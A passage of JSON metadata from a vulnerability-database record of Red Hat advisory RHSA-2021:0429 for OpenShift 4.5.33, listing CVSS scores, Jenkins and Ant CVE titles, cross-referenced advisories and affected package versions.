"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.1, "impactScore": 5.9}, "href": "https://access.redhat.com/errata/RHSA-2021:0429", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2020-11979", "CVE-2020-1945", "CVE-2021-21602", "CVE-2021-21603", "CVE-2021-21604", "CVE-2021-21605", "CVE-2021-21606", "CVE-2021-21607", "CVE-2021-21608", "CVE-2021-21609", "CVE-2021-21610", "CVE-2021-21611", "CVE-2021-21615"], "immutableFields": [], "lastseen": "2021-08-25T20:37:21", "history": [{"bulletin": {"id": "RHSA-2021:0429", "hash": "b9a2baa3b044f5ed79e05ea43bf2725c", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2021:0429) Important: OpenShift Container Platform 4.5.33 packages and security update", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nThis advisory contains the RPM packages for Red Hat OpenShift Container\nPlatform 4.5.33. See the following advisory for the container images for\nthis release:\n\nhttps://access.redhat.com/errata/RHSA-2021:0428\n\nSecurity Fix(es):\n\n* jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n* jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n* jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n* jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n* jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n* jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\n* ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n* ant: insecure temporary file (CVE-2020-11979)\n\n* jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n* jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n* jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n* jenkins: Filesystem traversal by privileged users (CVE-2021-21615)\n\n* jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "published": "2021-03-03T08:59:11", "modified": "2021-03-03T09:04:26", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://access.redhat.com/errata/RHSA-2021:0429", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2020-11979", "CVE-2020-1945", "CVE-2021-21602", "CVE-2021-21603", "CVE-2021-21604", "CVE-2021-21605", "CVE-2021-21606", "CVE-2021-21607", "CVE-2021-21608", "CVE-2021-21609", "CVE-2021-21610", "CVE-2021-21611", "CVE-2021-21615"], "immutableFields": [], "lastseen": "2021-03-03T06:47:06", "history": [], "viewCount": 52, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["FREEBSD_PKG_D6F76976E86D4F9A936276C849B10DB2.NASL", "FEDORA_2020-3CE0F55BC5.NASL", "FREEBSD_PKG_425F214388764B0AAF84E0238C5C2062.NASL", "PHOTONOS_PHSA-2020-1_0-0335_APACHE.NASL", "JENKINS_2_276.NASL", "FEDORA_2020-92B1D001B3.NASL", "REDHAT-RHSA-2021-0423.NASL", "JENKINS_2_274.NASL", "REDHAT-RHSA-2021-0429.NASL", "EULEROS_SA-2021-1133.NASL"]}, {"type": "redhat", "idList": ["RHSA-2021:0637", "RHSA-2021:0719", "RHSA-2020:4961", "RHSA-2020:2618", "RHSA-2020:4960", "RHSA-2021:0423"]}, {"type": "archlinux", "idList": ["ASA-202012-5", "ASA-202101-41", "ASA-202005-15"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-21608", "RH:CVE-2020-11979", "RH:CVE-2021-21611", "RH:CVE-2021-21615", "RH:CVE-2021-21610", "RH:CVE-2021-21607", "RH:CVE-2021-21603", "RH:CVE-2021-21606", "RH:CVE-2021-21602", "RH:CVE-2021-21609"]}, {"type": "cve", "idList": ["CVE-2021-21602", "CVE-2021-21606", "CVE-2021-21609", "CVE-2021-21610", "CVE-2021-21603", "CVE-2021-21615", "CVE-2021-21608", "CVE-2021-21611", "CVE-2021-21607", "CVE-2021-21605"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-11979", "UB:CVE-2020-1945"]}, {"type": "fedora", "idList": ["FEDORA:146FE30DD5E7", "FEDORA:2D51F60C28B2", "FEDORA:88EAA30905CF", "FEDORA:52396606732B", "FEDORA:6869030D3139"]}, {"type": "gentoo", "idList": ["GLSA-202011-18", "GLSA-202007-34"]}, {"type": "github", "idList": ["GHSA-4P6W-M9WC-C9C9", "GHSA-F62V-XPXF-3V68"]}, {"type": "ubuntu", "idList": ["USN-4380-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310877939", "OPENVAS:1361412562310877930", "OPENVAS:1361412562310844454"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1022-1"]}, {"type": "freebsd", "idList": ["6D5F1B0B-B865-48D5-935B-3FB6EBB425FC"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2021", "ORACLE:CPUJUL2020", "ORACLE:CPUJAN2021", "ORACLE:CPUOCT2020"]}], "modified": "2021-03-03T06:47:06", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-03-03T06:47:06", "rev": 2}}, "objectVersion": "1.5", "affectedPackage": [{"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageName": "conmon", "packageVersion": "2.0.21-1.rhaos4.5.el8", "packageFilename": "conmon-2.0.21-1.rhaos4.5.el8.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageName": "machine-config-daemon", "packageVersion": "4.5.0-202102050524.p0.git.2594.ff3b8c0.el8", "packageFilename": "machine-config-daemon-4.5.0-202102050524.p0.git.2594.ff3b8c0.el8.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageName": "machine-config-daemon", "packageVersion": "4.5.0-202102050524.p0.git.2594.ff3b8c0.el8", "packageFilename": "machine-config-daemon-4.5.0-202102050524.p0.git.2594.ff3b8c0.el8.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "openshift-hyperkube", "packageVersion": "4.5.0-202102050524.p0.git.0.9229406.el7", "packageFilename": "openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "openshift-ansible", "packageVersion": "4.5.0-202102031005.p0.git.0.c6839a2.el7", "packageFilename": "openshift-ansible-4.5.0-202102031005.p0.git.0.c6839a2.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageName": "runc", "packageVersion": "1.0.0-72.rhaos4.5.giteadfc6b.el8", "packageFilename": "runc-1.0.0-72.rhaos4.5.giteadfc6b.el8.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageName": "conmon", "packageVersion": "2.0.21-1.rhaos4.5.el8", "packageFilename": "conmon-2.0.21-1.rhaos4.5.el8.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageName": "runc-debugsource", "packageVersion": "1.0.0-72.rhaos4.5.giteadfc6b.el8", "packageFilename": "runc-debugsource-1.0.0-72.rhaos4.5.giteadfc6b.el8.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageName": "openshift-clients", "packageVersion": "4.5.0-202102051529.p0.git.3612.61b096a.el8", "packageFilename": "openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el8.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "s390x", "packageName": "conmon", "packageVersion": "2.0.21-1.rhaos4.5.el7", "packageFilename": "conmon-2.0.21-1.rhaos4.5.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageName": "openshift-hyperkube", "packageVersion": "4.5.0-202102050524.p0.git.0.9229406.el8", "packageFilename": "openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el8.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageName": "openshift-clients", "packageVersion": "4.5.0-202102051529.p0.git.3612.61b096a.el8", "packageFilename": "openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el8.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "conmon", "packageVersion": "2.0.21-1.rhaos4.5.el7", "packageFilename": "conmon-2.0.21-1.rhaos4.5.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "openshift-hyperkube", "packageVersion": "4.5.0-202102050524.p0.git.0.9229406.el7", "packageFilename": "openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "openshift-clients", "packageVersion": "4.5.0-202102051529.p0.git.3612.61b096a.el7", "packageFilename": "openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageName": "runc-debuginfo", "packageVersion": "1.0.0-72.rhaos4.5.giteadfc6b.el8", "packageFilename": "runc-debuginfo-1.0.0-72.rhaos4.5.giteadfc6b.el8.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "s390x", "packageName": "openshift-hyperkube", "packageVersion": "4.5.0-202102050524.p0.git.0.9229406.el7", "packageFilename": "openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "openshift-clients", "packageVersion": "4.5.0-202102051529.p0.git.3612.61b096a.el7", "packageFilename": "openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageName": "runc-debuginfo", "packageVersion": "1.0.0-72.rhaos4.5.giteadfc6b.el8", "packageFilename": "runc-debuginfo-1.0.0-72.rhaos4.5.giteadfc6b.el8.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "conmon", "packageVersion": "2.0.21-1.rhaos4.5.el7", "packageFilename": "conmon-2.0.21-1.rhaos4.5.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageName": "openshift-hyperkube", "packageVersion": "4.5.0-202102050524.p0.git.0.9229406.el8", "packageFilename": "openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el8.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageName": "runc-debugsource", "packageVersion": "1.0.0-72.rhaos4.5.giteadfc6b.el8", "packageFilename": "runc-debugsource-1.0.0-72.rhaos4.5.giteadfc6b.el8.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "s390x", "packageName": "openshift-clients", "packageVersion": "4.5.0-202102051529.p0.git.3612.61b096a.el7", "packageFilename": "openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageName": "conmon", "packageVersion": "2.0.21-1.rhaos4.5.el8", "packageFilename": "conmon-2.0.21-1.rhaos4.5.el8.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "conmon", "packageVersion": "2.0.21-1.rhaos4.5.el7", "packageFilename": "conmon-2.0.21-1.rhaos4.5.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageName": "openshift-hyperkube", "packageVersion": "4.5.0-202102050524.p0.git.0.9229406.el8", "packageFilename": "openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el8.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageName": "machine-config-daemon", "packageVersion": "4.5.0-202102050524.p0.git.2594.ff3b8c0.el8", "packageFilename": "machine-config-daemon-4.5.0-202102050524.p0.git.2594.ff3b8c0.el8.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageName": "openshift-ansible", "packageVersion": "4.5.0-202102031005.p0.git.0.c6839a2.el7", "packageFilename": "openshift-ansible-4.5.0-202102031005.p0.git.0.c6839a2.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageName": "conmon", "packageVersion": "2.0.21-1.rhaos4.5.el8", "packageFilename": "conmon-2.0.21-1.rhaos4.5.el8.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageName": "runc-debuginfo", "packageVersion": "1.0.0-72.rhaos4.5.giteadfc6b.el8", "packageFilename": "runc-debuginfo-1.0.0-72.rhaos4.5.giteadfc6b.el8.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageName": "machine-config-daemon", "packageVersion": "4.5.0-202102050524.p0.git.2594.ff3b8c0.el8", "packageFilename": "machine-config-daemon-4.5.0-202102050524.p0.git.2594.ff3b8c0.el8.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageName": "runc", "packageVersion": "1.0.0-72.rhaos4.5.giteadfc6b.el8", "packageFilename": "runc-1.0.0-72.rhaos4.5.giteadfc6b.el8.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageName": "jenkins", "packageVersion": "2.263.3.1612434332-1.el7", "packageFilename": "jenkins-2.263.3.1612434332-1.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageName": "openshift-clients-redistributable", "packageVersion": "4.5.0-202102051529.p0.git.3612.61b096a.el8", "packageFilename": "openshift-clients-redistributable-4.5.0-202102051529.p0.git.3612.61b096a.el8.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageName": "openshift", "packageVersion": "4.5.0-202102050524.p0.git.0.9229406.el8", "packageFilename": "openshift-4.5.0-202102050524.p0.git.0.9229406.el8.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageName": "runc", "packageVersion": "1.0.0-72.rhaos4.5.giteadfc6b.el8", "packageFilename": "runc-1.0.0-72.rhaos4.5.giteadfc6b.el8.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageName": "openshift-clients", "packageVersion": "4.5.0-202102051529.p0.git.3612.61b096a.el8", "packageFilename": "openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el8.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageName": "runc-debugsource", "packageVersion": "1.0.0-72.rhaos4.5.giteadfc6b.el8", "packageFilename": "runc-debugsource-1.0.0-72.rhaos4.5.giteadfc6b.el8.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageName": "runc", "packageVersion": "1.0.0-72.rhaos4.5.giteadfc6b.el8", "packageFilename": "runc-1.0.0-72.rhaos4.5.giteadfc6b.el8.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageName": "openshift-ansible-test", "packageVersion": "4.5.0-202102031005.p0.git.0.c6839a2.el7", "packageFilename": "openshift-ansible-test-4.5.0-202102031005.p0.git.0.c6839a2.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "openshift", "packageVersion": "4.5.0-202102050524.p0.git.0.9229406.el7", "packageFilename": "openshift-4.5.0-202102050524.p0.git.0.9229406.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "openshift-clients-redistributable", "packageVersion": "4.5.0-202102051529.p0.git.3612.61b096a.el7", "packageFilename": "openshift-clients-redistributable-4.5.0-202102051529.p0.git.3612.61b096a.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageName": "openshift-clients", "packageVersion": "4.5.0-202102051529.p0.git.3612.61b096a.el8", "packageFilename": "openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el8.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "openshift-clients", "packageVersion": "4.5.0-202102051529.p0.git.3612.61b096a.el7", "packageFilename": "openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "jenkins", "packageVersion": "2.263.3.1612434332-1.el7", "packageFilename": "jenkins-2.263.3.1612434332-1.el7.src.rpm", "operator": "lt"}], "vendorCvss": {}}, "lastseen": "2021-03-03T06:47:06", "differentElements": ["cvss2", "cvss3"], "edition": 1}, {"bulletin": {"id": "RHSA-2021:0429", "hash": "ad69366e37a00f26fad14e2bfaaee1bc", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2021:0429) Important: OpenShift Container Platform 4.5.33 packages and security update", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nThis advisory contains the RPM packages for Red Hat OpenShift Container\nPlatform 4.5.33. See the following advisory for the container images for\nthis release:\n\nhttps://access.redhat.com/errata/RHSA-2021:0428\n\nSecurity Fix(es):\n\n* jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n* jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n* jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n* jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n* jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n* jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\n* ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n* ant: insecure temporary file (CVE-2020-11979)\n\n* jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n* jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n* jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n* jenkins: Filesystem traversal by privileged users (CVE-2021-21615)\n\n* jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "published": "2021-03-03T08:59:11", "modified": "2021-03-03T09:04:26", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 6.8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.0, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.1, "impactScore": 5.9}, "href": "https://access.redhat.com/errata/RHSA-2021:0429", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2020-11979", "CVE-2020-1945", "CVE-2021-21602", "CVE-2021-21603", "CVE-2021-21604", "CVE-2021-21605", "CVE-2021-21606", "CVE-2021-21607", "CVE-2021-21608", "CVE-2021-21609", "CVE-2021-21610", "CVE-2021-21611", "CVE-2021-21615"], "immutableFields": [], "lastseen": "2021-07-28T14:35:14", "history": [], "viewCount": 55, "enchantments": {"dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2021:0423", "RHSA-2020:2618", "RHSA-2020:4961", "RHSA-2021:0719", "RHSA-2021:0637", "RHSA-2020:4960"]}, {"type": "nessus", "idList": ["FEDORA_2020-2640AA4E19.NASL", "FEDORA_2020-3CE0F55BC5.NASL", "JENKINS_2_274.NASL", "EULEROS_SA-2021-1133.NASL", "PHOTONOS_PHSA-2020-1_0-0335_APACHE.NASL", "REDHAT-RHSA-2021-0429.NASL", "REDHAT-RHSA-2021-0423.NASL", "PHOTONOS_PHSA-2020-3_0-0155_APACHE.NASL", "JENKINS_2_276.NASL", "PHOTONOS_PHSA-2020-2_0-0291_APACHE.NASL"]}, {"type": "archlinux", "idList": ["ASA-202005-15", "ASA-202101-41", "ASA-202012-5"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-21607", "RH:CVE-2021-21608", "RH:CVE-2021-21604", "RH:CVE-2020-11979", "RH:CVE-2021-21611", "RH:CVE-2021-21610", "RH:CVE-2021-21602", "RH:CVE-2021-21615", "RH:CVE-2021-21609", "RH:CVE-2021-21606"]}, {"type": "cve", "idList": ["CVE-2021-21609", "CVE-2021-21603", "CVE-2021-21604", "CVE-2021-21615", "CVE-2021-21602", "CVE-2021-21607", "CVE-2021-21611", "CVE-2021-21610", "CVE-2021-21606", "CVE-2021-21608"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-11979", "UB:CVE-2020-1945"]}, {"type": "gentoo", "idList": ["GLSA-202007-34", "GLSA-202011-18"]}, {"type": "fedora", "idList": ["FEDORA:2D51F60C28B2", "FEDORA:52396606732B", "FEDORA:88EAA30905CF", "FEDORA:6869030D3139", "FEDORA:146FE30DD5E7"]}, {"type": "github", "idList": ["GHSA-F62V-XPXF-3V68", "GHSA-4P6W-M9WC-C9C9"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310877939", "OPENVAS:1361412562310844454", "OPENVAS:1361412562310877930"]}, {"type": "ubuntu", "idList": ["USN-4380-1"]}, {"type": "freebsd", "idList": ["6D5F1B0B-B865-48D5-935B-3FB6EBB425FC"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1022-1"]}, {"type": "oracle", "idList": ["ORACLE:CPUJUL2020", "ORACLE:CPUJUL2021", "ORACLE:CPUAPR2021", "ORACLE:CPUJAN2021", "ORACLE:CPUOCT2020"]}], "modified": "2021-07-28T14:35:14", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-07-28T14:35:14", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "4.5.0-202102051529.p0.git.3612.61b096a.el7", "packageFilename": "openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el7.x86_64.rpm", "operator": "lt", "packageName": "openshift-clients"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "2.263.3.1612434332-1.el7", "packageFilename": "jenkins-2.263.3.1612434332-1.el7.src.rpm", "operator": "lt", "packageName": "jenkins"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageVersion": "2.0.21-1.rhaos4.5.el8", "packageFilename": "conmon-2.0.21-1.rhaos4.5.el8.src.rpm", "operator": "lt", "packageName": "conmon"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageVersion": "1.0.0-72.rhaos4.5.giteadfc6b.el8", "packageFilename": "runc-debuginfo-1.0.0-72.rhaos4.5.giteadfc6b.el8.x86_64.rpm", "operator": "lt", "packageName": "runc-debuginfo"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageVersion": "1.0.0-72.rhaos4.5.giteadfc6b.el8", "packageFilename": "runc-1.0.0-72.rhaos4.5.giteadfc6b.el8.ppc64le.rpm", "operator": "lt", "packageName": "runc"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageVersion": "4.5.0-202102050524.p0.git.0.9229406.el8", "packageFilename": "openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el8.x86_64.rpm", "operator": "lt", "packageName": "openshift-hyperkube"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageVersion": "4.5.0-202102050524.p0.git.2594.ff3b8c0.el8", "packageFilename": "machine-config-daemon-4.5.0-202102050524.p0.git.2594.ff3b8c0.el8.src.rpm", "operator": "lt", "packageName": "machine-config-daemon"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageVersion": "4.5.0-202102051529.p0.git.3612.61b096a.el8", "packageFilename": "openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el8.ppc64le.rpm", "operator": "lt", "packageName": "openshift-clients"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "4.5.0-202102050524.p0.git.0.9229406.el7", "packageFilename": "openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el7.ppc64le.rpm", "operator": "lt", "packageName": "openshift-hyperkube"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "4.5.0-202102050524.p0.git.0.9229406.el7", "packageFilename": "openshift-4.5.0-202102050524.p0.git.0.9229406.el7.src.rpm", "operator": "lt", "packageName": "openshift"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageVersion": "2.0.21-1.rhaos4.5.el8", "packageFilename": "conmon-2.0.21-1.rhaos4.5.el8.ppc64le.rpm", "operator": "lt", "packageName": "conmon"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageVersion": "4.5.0-202102050524.p0.git.2594.ff3b8c0.el8", "packageFilename": "machine-config-daemon-4.5.0-202102050524.p0.git.2594.ff3b8c0.el8.ppc64le.rpm", "operator": "lt", "packageName": "machine-config-daemon"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "2.0.21-1.rhaos4.5.el7", "packageFilename": "conmon-2.0.21-1.rhaos4.5.el7.ppc64le.rpm", "operator": "lt", "packageName": "conmon"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageVersion": "1.0.0-72.rhaos4.5.giteadfc6b.el8", "packageFilename": "runc-1.0.0-72.rhaos4.5.giteadfc6b.el8.src.rpm", "operator": "lt", "packageName": "runc"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "4.5.0-202102051529.p0.git.3612.61b096a.el7", "packageFilename": "openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el7.ppc64le.rpm", "operator": "lt", "packageName": "openshift-clients"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageVersion": "1.0.0-72.rhaos4.5.giteadfc6b.el8", "packageFilename": "runc-debuginfo-1.0.0-72.rhaos4.5.giteadfc6b.el8.s390x.rpm", "operator": "lt", "packageName": "runc-debuginfo"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageVersion": "2.0.21-1.rhaos4.5.el8", "packageFilename": "conmon-2.0.21-1.rhaos4.5.el8.x86_64.rpm", "operator": "lt", "packageName": "conmon"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageVersion": "4.5.0-202102050524.p0.git.2594.ff3b8c0.el8", "packageFilename": "machine-config-daemon-4.5.0-202102050524.p0.git.2594.ff3b8c0.el8.s390x.rpm", "operator": "lt", "packageName": "machine-config-daemon"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "2.0.21-1.rhaos4.5.el7", "packageFilename": "conmon-2.0.21-1.rhaos4.5.el7.x86_64.rpm", "operator": "lt", "packageName": "conmon"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "2.0.21-1.rhaos4.5.el7", "packageFilename": "conmon-2.0.21-1.rhaos4.5.el7.src.rpm", "operator": "lt", "packageName": "conmon"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageVersion": "4.5.0-202102051529.p0.git.3612.61b096a.el8", "packageFilename": "openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el8.s390x.rpm", "operator": "lt", "packageName": "openshift-clients"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageVersion": "1.0.0-72.rhaos4.5.giteadfc6b.el8", "packageFilename": "runc-debugsource-1.0.0-72.rhaos4.5.giteadfc6b.el8.s390x.rpm", "operator": "lt", "packageName": "runc-debugsource"}, {"OS": "RedHat", "OSVersion": "7", "arch": "s390x", "packageVersion": "4.5.0-202102050524.p0.git.0.9229406.el7", "packageFilename": "openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el7.s390x.rpm", "operator": "lt", "packageName": "openshift-hyperkube"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageVersion": "4.5.0-202102051529.p0.git.3612.61b096a.el8", "packageFilename": "openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el8.x86_64.rpm", "operator": "lt", "packageName": "openshift-clients"}, 